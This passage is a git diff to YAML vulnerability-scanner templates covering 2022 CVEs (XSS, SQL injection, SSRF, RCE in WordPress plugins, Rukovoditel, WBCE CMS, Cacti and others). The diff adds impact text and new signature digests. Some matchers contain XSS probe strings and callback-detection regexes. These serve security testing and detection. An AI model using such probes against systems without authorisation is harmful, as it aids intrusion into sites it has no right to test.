+++ b/http/cves/2022/CVE-2022-4321.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress website, potentially leading to unauthorized access, data theft, or further compromise of the website.
   remediation: Fixed in version 1.1.2
   reference:
     - https://wpscan.com/vulnerability/6ac1259c-86d9-428b-ba98-7f3d07910644
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d1f1763d59e6b40c0bc4f52d632ea0b73e3365add3bc3af11e12f2c07070543d022100a2b8a7a2f6173f03a6df74b819fdfb9cdcf52cce01144005995c085fc92ce588:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f8103f7ef8868e72da0087ba6c89753c9b3e3dcb9b4c4ec35fe8312ed3e4da0f02204ec3ee3cbcecf054ab393c3686820340df9329b731d3c16645109896e8b6918f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml
index c3ab07c21a..f88c6359e9 100644
--- a/http/cves/2022/CVE-2022-4325.yaml
+++ b/http/cves/2022/CVE-2022-4325.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: Fixed in version 1.10.1.
   reference:
     - https://wpscan.com/vulnerability/5b983c48-6b05-47cf-85cb-28bbeec17395
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "<script>alert(`document.domain`)</script>")'
           - 'contains(body_2, "Post Status Notifier Lite")'
         condition: and
-# digest: 4a0a0047304502203b6c09b27d8f276d25aab773230c3a40cc09cbe800237480dfed373715cd923d022100c6c622821522db3c2b21147f59a0fb7eb6a4f9313bef135c9e5a5305469489df:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b9c7b7c0a9b75b48e22d2a2c1da357c209c8fc10c51b5e9a55b3902e53e7e2ce022025671ae769a0aa68b035df07b5b3027e593a37cd61f9ce3dbcaf3f894e881fc3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml
index 2bc9730fca..d131bc2e8c 100644
--- a/http/cves/2022/CVE-2022-43769.yaml
+++ b/http/cves/2022/CVE-2022-43769.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.
   remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2.
   reference:
     - https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-
@@ -48,4 +50,4 @@ http:
         part: header
         words:
           - "application/json"
-# digest: 4a0a00473045022100915e04ca7574a8343fc0af41c8229d48e8c7aa817c2f0057730a7e9191bc1f5602206229fe597d4e888dd5d6c9d130801296e2c6ba65c970e2b34208e5a2977f263e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220441f6ba0f3ef401dbf7eec9c7ffb38b29d0c6d608c0917e52f9b48d943d1e2e302207213194fe722413d098121eb7c1ef087842984b14e27ffda11db49711be374d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml
index d0927fa87e..92768c42fa 100644
--- a/http/cves/2022/CVE-2022-4447.yaml
+++ b/http/cves/2022/CVE-2022-4447.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action.  An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
   remediation: |
     Update the Fontsy plugin to the latest version (>=1.8.7) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "{{md5(num)}}")'
         condition: and
-# digest: 4a0a00473045022100dc73dc71bae0ff55b28f43b3f09af9912056a7f9ed8aa96f044ac7c0d43e4380022055c44e757e11bccfbc4820f1f70bb99692506130e0da103c4328a3dff3326182:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207d946cf8d2d891d40004e0f230f26aab95b329cdd3921e4e95e0a88b18544340022100a607f1fc6e85f464abddece4dec9be3bb9c51061e22244f4385025293c0f32a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml
index 2fea24e4af..1ea4d7fc78 100644
--- a/http/cves/2022/CVE-2022-44877.yaml
+++ b/http/cves/2022/CVE-2022-44877.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade to CentOS Web Panel version 0.9.8.1147 or later to mitigate this vulnerability.
   reference:
@@ -61,4 +63,4 @@ http:
         regex:
           - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
         part: interactsh_request
-# digest: 4b0a00483046022100f03a379f0af5f28e3ad724853b39caf3dd4728f59e19521a21102d5c46b56e14022100b0f355594067f35f5648251312eb338cfcd1c7077b1a5148690d2d48197545cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022031f7cbc052ab98b6bec8969d8c4f4a8c3ca90d829b8d2e1bdcae1ea44e30a97202206616cbe35349e1471c10547d71ed40ba3bb19d1e5e4daaef0288b9816ad6ecdb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml
index 1a185032d4..d053e1a159 100644
--- a/http/cves/2022/CVE-2022-44944.yaml
+++ b/http/cves/2022/CVE-2022-44944.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.
   reference:
@@ -65,4 +67,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 4a0a004730450221008c57187bdbe0ed7c8970c8e84e066072c488286181829618f7909cf435555c7802202ebe6ca1c7f020b076386dfcbed6220f74a36700a3b067d9c7ac219c18da9cb0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204a2977ecab2f861b799d6238720bcc4694f30fd1a4970cf5b36f44f928ddaf17022100d4fb5c047ad5647f337230c9b0abe80785ddc04f1e5faf5c5433c27c4dd11b00:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml
index c4ea1eb926..3805a9edd6 100644
--- a/http/cves/2022/CVE-2022-44947.yaml
+++ b/http/cves/2022/CVE-2022-44947.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add".
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.
   reference:
@@ -65,4 +67,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 4b0a00483046022100cceda4eeb180375db053da5263eb95654b4d5609e18741e40f0a4905b95e503b022100b1c2bb002ac2451ad51db9107c1605b8980e0566040b7b82cd240d72bccd9901:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205f40637738dd7bbc78592292769575175136fe940a3793f48c10a62eea189248022023fe9304674013754d0776159436f45cc459d5fe2199329b6b111a07f2c7edd5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml
index ea5ef0e975..9c7d0ab15c 100644
--- a/http/cves/2022/CVE-2022-44948.yaml
+++ b/http/cves/2022/CVE-2022-44948.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add".
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.
   reference:
@@ -64,4 +66,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 4b0a0048304602210089dfa526ab226829e037ae33a22986bd18073188613ad1b2fcc2685f39e3c1c2022100f9db594c24a9b3913c881bccad8422ac6b57eb9811cc2cd3869e1ea5fb07263a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c0986f30e9b959cd292ddba5429e7933a4996f07192c2bc9c3a3c6d4bec0c79d02201070f43f854fb878a386a92edfa9befc2101ee2b67db24f71407249d3c0f4aaf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml
index 30acfe7672..efbd276236 100644
--- a/http/cves/2022/CVE-2022-44949.yaml
+++ b/http/cves/2022/CVE-2022-44949.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.
   reference:
@@ -132,4 +134,4 @@ http:
         regex:
           - id="form_session_token" value="(.*)" type="hidden"
         internal: true
-# digest: 4b0a004830460221008d8df14852f5f2f7f020ddb11b9c1fcf2bde5079f535106859009fd3eae28cad0221009ab1e3854133c9fafcdf742df808bd1a3de75f475a8867a6270500484d0b2345:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ad522c5d7866b000194ae5779e8b768dce4cce2ff3cb070f2006a3016e520714022100b082af6791cbd056fcd52d9e43790c504283df20d0c5e2535b73d94edcd53ea8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml
index 13d48d3797..bb4d95ad9c 100644
--- a/http/cves/2022/CVE-2022-44950.yaml
+++ b/http/cves/2022/CVE-2022-44950.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.
   reference:
@@ -132,4 +134,4 @@ http:
         regex:
           - id="form_session_token" value="(.*)" type="hidden"
         internal: true
-# digest: 490a00463044022063b0b75dddd438d97f1b2dd4aac53c3a3be45fe4ddaaa0150b8cf989aae79a6d02206ccfc25c4ce30b34d92af19be986592e96d2f7cc46a729500122429491f7570f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cd92e3f197e4245559c15e422d6fd259ba044745be180877b10887027c877e3e02206c053bbcf5203d6a7360150699f54bae6d3ab68f9f6e19045c11813832e06468:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml
index 36f1d440ba..8510ec7790 100644
--- a/http/cves/2022/CVE-2022-44951.yaml
+++ b/http/cves/2022/CVE-2022-44951.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 4b0a00483046022100a93452e43794b19607aa6fd1b454bad551477190b46d116667dccf79befd9d58022100f10eb2d2fe807e158da4324619c52036092110239b9557d86f0e73f3e1c0ac12:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e2346f60dc9dfffb86526db2ab648e04c663722f64e2ce787934d1d3bb2c1fb7022100a96b17036f8c85d610a785110c491f5486c9ad5fbc9e56f1fb98a397bd170643:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml
index 756e142a86..96dabf9637 100644
--- a/http/cves/2022/CVE-2022-44952.yaml
+++ b/http/cves/2022/CVE-2022-44952.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add".
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability.
   reference:
@@ -145,4 +147,4 @@ http:
         regex:
           - id="form_session_token" value="(.*)" type="hidden"
         internal: true
-# digest: 490a00463044022076df995fd2b53bd16f07ee4b4ace1641e868eef1c400b8791268cd2b1aa61f6002201a496d348c744be7d75ad9ac1b1972059dd674597450cd02be5eecd615e9ee37:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210097040b67063b5764fce21d7fc0b16da15de0b5053275f35eff09d78a08a8e0b1022100ec92b94053b168b0e3dccd3803db81398b7fd27b4692e8f7db5539509f4a3730:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml
index 388e912a9b..455d6f436f 100644
--- a/http/cves/2022/CVE-2022-45037.yaml
+++ b/http/cves/2022/CVE-2022-45037.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version of WBCE CMS or apply the necessary patches provided by the vendor to fix the Cross Site Scripting vulnerability.
   reference:
@@ -101,4 +103,4 @@ http:
           - 'name="username_fieldname" value="(.*)"'
         internal: true
         part: body
-# digest: 4a0a0047304502205831903698b125321463e8e51d11eacda82144c6ed9d6cd6ab58c1de6429bd7b022100dc3741ed1a229f2205eb4e8c88908d294de5dcb7efec4f5629c1a9d4621a78e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009ff4a20352a11f77f06ebd143c7abc4ef75e2051fa28dbc10076c49044b8ee17022100fc7d387f4c60d28df6adcbb65a7f721547d9f9e9a4af6bbe8314070858fbb099:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml
index 5109d27df6..ab189775cd 100644
--- a/http/cves/2022/CVE-2022-45038.yaml
+++ b/http/cves/2022/CVE-2022-45038.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to a patched version of WBCE CMS or apply the necessary security patches provided by the vendor.
   reference:
@@ -101,4 +103,4 @@ http:
           - 'name="app_name" value="(.*?)"'
         internal: true
         part: body
-# digest: 4a0a00473045022100ffa1a7dfcde0a79568a6543e2e042e587a4c532ae4d3793a3e9e73000f9d555002203036bed87e36b0417af2acf733a3e0be580d66cf53a4bce1446e7f106de97bb8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100df6d277b750d90721c9ef90b91a93aabc66f9c8433cd489b06fb843aad2d3069022100fd2a9b7fe15449e085e43750c8374739cdb49fd0519875b503c66176321325d6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-45354.yaml b/http/cves/2022/CVE-2022-45354.yaml
index d1ab7b9210..a2ea276e6e 100644
--- a/http/cves/2022/CVE-2022-45354.yaml
+++ b/http/cves/2022/CVE-2022-45354.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks or unauthorized access.
   remediation: |
     Update to the latest version of the Download Monitor plugin (4.7.60) or apply the provided patch to fix the vulnerability.
   reference:
@@ -39,5 +41,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a0046304402202b5c87ca1023260f4efdf189c9853d10e43d226515063195b6b48f7f72d486f1022063ca220113fa902ef786d71ab90b4fb066f810430711acbad5b73287cff1da6e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100dac1d576348d72b769c4c047bc92365a6aea20936e7fdcfcad2d98306f4500ba022100e8f57764f5b6ae95a0fd92700d6903227cef5f747c845a3f405981a6ad338723:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-45805.yaml b/http/cves/2022/CVE-2022-45805.yaml
index 2a39e7e949..4cbe5dfd11 100644
--- a/http/cves/2022/CVE-2022-45805.yaml
+++ b/http/cves/2022/CVE-2022-45805.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Paytm Payment Gateway plugin through 2.7.3 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    An attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
   remediation: Update to version 2.7.7 or a newer patched version.
   reference:
     - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-3-auth-sql-injection-sqli-vulnerability
@@ -48,4 +50,4 @@ http:
           - 'status_code_2 == 200'
           - 'contains(body_2, "toplevel_page_paytm")'
         condition: and
-# digest: 490a00463044022038cacec82e9542211faf8d40f46da93043b1d04baaa5bf4e54dbb9d6d2b45ad70220299d0e2694a68682b16c7b922945895d709a64f02f27759d69fbd893454dbfd6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220510b6f512adea2de662e70c470c9a947fe4b48416b91cbfebbd80e3552a6ea2602210094f25ae6149bbdb6fd6ca37a471239c931df0b3f501c45e8ee3c8af9a2741fe9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-45835.yaml b/http/cves/2022/CVE-2022-45835.yaml
index 1dc4e622ab..b4c112b4a6 100644
--- a/http/cves/2022/CVE-2022-45835.yaml
+++ b/http/cves/2022/CVE-2022-45835.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    An attacker can exploit this vulnerability to send arbitrary HTTP requests from the server, potentially leading to unauthorized access to internal resources or performing actions on behalf of the server.
   remediation: Fixed in version 2.0.0.
   reference:
     - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203a24d4430d28b8d6518129f7eddf11b8bb21d3feee611896bd166c3b9efab5eb022100ae32b72170d1a4f6cf372bb897139c260524216160a6ebd6123014cd0acee161:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e46917e102515ca1ecff50c0fc7a7f0785abe1ece54020697136a0119cf81c46022100aa665f8e3c63f6c2bcd0072f0e336f3e8db2d4f9fe23a802e9fd8bf32ad80d79:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml
index 6c2ef471dd..61f14b9e91 100644
--- a/http/cves/2022/CVE-2022-45917.yaml
+++ b/http/cves/2022/CVE-2022-45917.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
   remediation: |
     Upgrade to ILIAS eLearning version 7.16 or later to fix the open redirect vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
-# digest: 4b0a00483046022100b6af0dace7c3c859fd2d942d5c2ee2402d90df93af707173e041ebcd54ef2ab40221008eb39aa30ba906ebd46c57637732ff7815bcd4885e53e5bc540e03d8d6c9fc69:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d66368b83286a496589d27f79be98ee5fa02f31375ef94d60ee24b79b6db0275022100a51036dd18a690f38bb459abd2ca3483ccf0ce788b0b47042ab25c7318214873:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml
index 29fbd6ea90..80c113a9c7 100644
--- a/http/cves/2022/CVE-2022-46020.yaml
+++ b/http/cves/2022/CVE-2022-46020.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability.
   reference:
@@ -131,4 +133,4 @@ http:
           - name="app_name" value="(.*)"
         internal: true
         part: body
-# digest: 490a0046304402203cb8c698e2bf7fc453388e74740f52f4aa1b59324e312d7d046f4cddc947f0a902206365584532ec3548deae323416de18bd7be68ec5dc24fd6387fca90d403ab471:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100baec7225c2e150d59e5411f2fa71359d30d8355f4360006bbbea33dd76d78073022100f7540a59948e2315e822b9f22fe9c1b4a74323283a376f73a162d8cd8152e84c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml
index f3b579a09e..43a3808595 100644
--- a/http/cves/2022/CVE-2022-46071.yaml
+++ b/http/cves/2022/CVE-2022-46071.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'status_code_2 == 200'
           - 'contains(body_2, "Helmet Store") && contains(body_2, "Adminstrator Admin")'
         condition: and
-# digest: 490a004630440220544c614e4b405a73eaf1fd273f9f70d53f29717699433762467970537756855902207028677d877eafaf9e7b8ca0b8743bb14818132cadb7c1dfc8a610ede15c168b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100997cb95ea75ee99cd985aabe34a74ea55e2d4422e703a016d6675c697c067cba02201b1ec1aac55e8391b318f6205b0f5bfeb7cbb384e89fbeafe36e8221c2d2d4a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml
index 20db5e9285..a3250b1e22 100644
--- a/http/cves/2022/CVE-2022-46073.yaml
+++ b/http/cves/2022/CVE-2022-46073.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
           - 'contains(body, "Helmet Store Showroom")'
           - 'contains(body, "><script>alert(document.domain)</script>")'
         condition: and
-# digest: 4b0a00483046022100f8706c5d542b9199f82d86111f07647a9d596b1269291632a30579b235f0f6b8022100aa5902f661043585fc92883d95a16da7849040d4f5eb0f3c7f5cf8616a63129b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022065309004dc74224483e207400e8619d99e8bd293709f38b1921e0926830de224022100b9cacacf30055121bbf235106133aae17546dae9b44137964448f3231c3412c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml
index a866afb89d..0e5a14436e 100644
--- a/http/cves/2022/CVE-2022-46169.yaml
+++ b/http/cves/2022/CVE-2022-46169.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
